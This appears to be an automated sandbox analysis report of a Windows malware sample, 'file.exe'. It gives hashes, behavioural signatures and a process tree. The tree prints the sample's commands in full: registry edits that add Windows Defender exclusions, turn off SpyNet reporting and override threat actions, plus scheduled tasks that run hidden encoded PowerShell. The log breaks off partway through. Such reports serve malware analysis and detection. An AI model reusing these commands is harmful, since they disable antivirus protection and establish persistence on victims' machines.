Analysis

  • max time kernel
    93s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2023, 22:24

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    de9c17de70d95c84444b0065f28c3846

  • SHA1

    aca26605ebe629962a42aeaae5fb9f3e456d5a94

  • SHA256

    c501c38cdcc1018ec60c9f79e21f5a6bac2a735aec14f1f08315f10599004948

  • SHA512

    8deaea1c564a388451b3bdb0e8777ecd5f4aa6cc8013e6b79bc7e461ec71f74d52ddda3737d27a43825488f466f78bbda4a63386159ce0696afa66824d7b983e

  • SSDEEP

    196608:91OW7D2FyKxQbvhDvQzijAVOesB/U9PnT0VdGx4AEHqHMzEn:3OW2yKxARjdNU9yGxgiVn

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Users\Admin\AppData\Local\Temp\7zSA27E.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Users\Admin\AppData\Local\Temp\7zSA5E9.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3472
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3980
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3904
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3700
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:1920
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3828
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3092
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3748
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:3552
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gpDXHenfs" /SC once /ST 08:47:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:936
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gpDXHenfs"
                  4⤵
                    PID:1960
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gpDXHenfs"
                    4⤵
                      PID:3652
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bdOiBdqpuCkxReDvuQ" /SC once /ST 22:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL\KSAEuFWCcrHcAGV\uImCXpn.exe\" a4 /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:908
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4224
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:4324
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:1956
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:2420
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:4656
                      • C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL\KSAEuFWCcrHcAGV\uImCXpn.exe
                        C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL\KSAEuFWCcrHcAGV\uImCXpn.exe a4 /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:532
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3436
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2580
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:3348
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:4292
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:220
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:3648
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:4812
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:4520
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:4988
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:3100
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:3344
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4284
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:3828
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:3760
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:3980
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:3328
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:3564
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:936
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:4628
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:4700
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:1836
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:1172
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:1112
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:1852
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:4344
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:2336
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CHuhsCCBcXQwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CHuhsCCBcXQwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LxYDbYlnU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LxYDbYlnU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RZsCfNWzpgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RZsCfNWzpgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lncXcBzRPHdnUZJHbuR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lncXcBzRPHdnUZJHbuR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mXTnalnaBsbU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mXTnalnaBsbU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UImdnrqMVCVhDJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UImdnrqMVCVhDJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WyLPlDtgpztVObbw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WyLPlDtgpztVObbw\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1312
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CHuhsCCBcXQwC" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:4448
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CHuhsCCBcXQwC" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:4652
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CHuhsCCBcXQwC" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:1296
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LxYDbYlnU" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:1364
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LxYDbYlnU" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:5084
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RZsCfNWzpgUn" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:5012
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RZsCfNWzpgUn" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:4324
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lncXcBzRPHdnUZJHbuR" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:3308
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lncXcBzRPHdnUZJHbuR" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:2988
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mXTnalnaBsbU2" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:3032
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mXTnalnaBsbU2" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:3652
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UImdnrqMVCVhDJVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:636
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UImdnrqMVCVhDJVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4972
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4820
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3220
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WyLPlDtgpztVObbw /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:1588
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WyLPlDtgpztVObbw /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4584
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gTZHaPYyM" /SC once /ST 05:21:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:2068
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "gTZHaPYyM"
